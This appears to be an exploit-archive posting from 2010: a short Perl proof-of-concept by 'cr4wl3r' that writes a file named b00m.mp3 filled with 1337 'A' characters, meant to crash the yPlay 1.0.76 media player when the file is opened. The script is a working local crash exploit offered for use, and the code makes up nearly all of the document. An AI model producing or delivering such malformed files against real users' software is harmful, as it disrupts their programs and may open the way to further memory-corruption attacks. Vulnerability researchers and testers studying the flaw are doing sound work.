id: 10154
date: 01/22/2010
title: yPlay 1.0.76 (.mp3) Local Crash PoC
author: cr4wl3r
cves: 

===================================
yPlay 1.0.76 (.mp3) Local Crash PoC
===================================


#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.mp3 >>>BOOM
#########################################################
 
 
print "#####################################################\n";
print "[!] yPlay 1.0.76 (.mp3) Local Crash PoC\n";
print "\n";
print "[!] Author: cr4wl3r\n";
print "#####################################################\n";
 
 
my $boom = "A" x 1337;
my $filename = "b00m.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";



#  0day.today [2023-03-26]  #